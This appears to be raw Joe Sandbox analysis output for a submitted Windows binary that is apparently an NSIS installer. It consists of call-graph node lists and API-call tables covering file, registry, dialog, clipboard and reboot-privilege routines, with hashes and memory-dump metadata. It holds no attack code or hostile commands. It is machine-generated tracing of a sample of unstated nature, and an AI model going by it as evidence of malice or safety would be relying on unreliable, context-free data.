4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 
4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 
4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 
3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 
3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 
4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 
3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 
403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 

Control-flow Graph
APIs
• GetDlgItem.USER32(?,00000403), ref: 0040515B
• GetDlgItem.USER32(?,000003EE), ref: 0040516A
• GetClientRect.USER32(?,?), ref: 004051C2
• GetSystemMetrics.USER32(00000015), ref: 004051CA
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
• ShowWindow.USER32(?,00000008), ref: 00405266
• GetDlgItem.USER32(?,000003EC), ref: 00405287
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
• GetDlgItem.USER32(?,000003F8), ref: 00405179
  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427979,759223A0,00000000), ref: 00406902
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• GetDlgItem.USER32(?,000003EC), ref: 004052D7
• CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
• CloseHandle.KERNELBASE(00000000), ref: 004052EC
• ShowWindow.USER32(00000000), ref: 00405313
• ShowWindow.USER32(?,00000008), ref: 00405318
• ShowWindow.USER32(00000008), ref: 0040535F
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
• CreatePopupMenu.USER32 ref: 004053A2
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
• GetWindowRect.USER32(?,?), ref: 004053CA
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
• OpenClipboard.USER32(00000000), ref: 00405437
• EmptyClipboard.USER32 ref: 0040543D
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
• GlobalLock.KERNEL32(00000000), ref: 00405453
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
• GlobalUnlock.KERNEL32(00000000), ref: 00405489
• SetClipboardData.USER32(0000000D,00000000), ref: 00405494
• CloseClipboard.USER32 ref: 0040549A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
• String ID: New install of "%s" to "%s"${
• API String ID: 2110491804-1641061399
• Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
• Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
• Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
• Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Control-flow Graph
                                                                                                      APIs
                                                                                                      • #17.COMCTL32 ref: 004038CE
                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                      • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                      • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                      • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                      • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                      • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                      • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                      • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                      • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                      • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                      • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                      • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                      • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                      • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                      • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                      • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                      • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                      • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                      • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                      • API String ID: 2435955865-3712954417
                                                                                                      • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                      • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                      • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                      • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                      • String ID: jF
                                                                                                      • API String ID: 2295610775-3349280890
                                                                                                      • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                      • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                      • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                      • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 310444273-0
                                                                                                      • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                      • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                      • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                      • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                      • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                      • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                      • ShowWindow.USER32(?), ref: 00401753
                                                                                                      • ShowWindow.USER32(?), ref: 00401767
                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
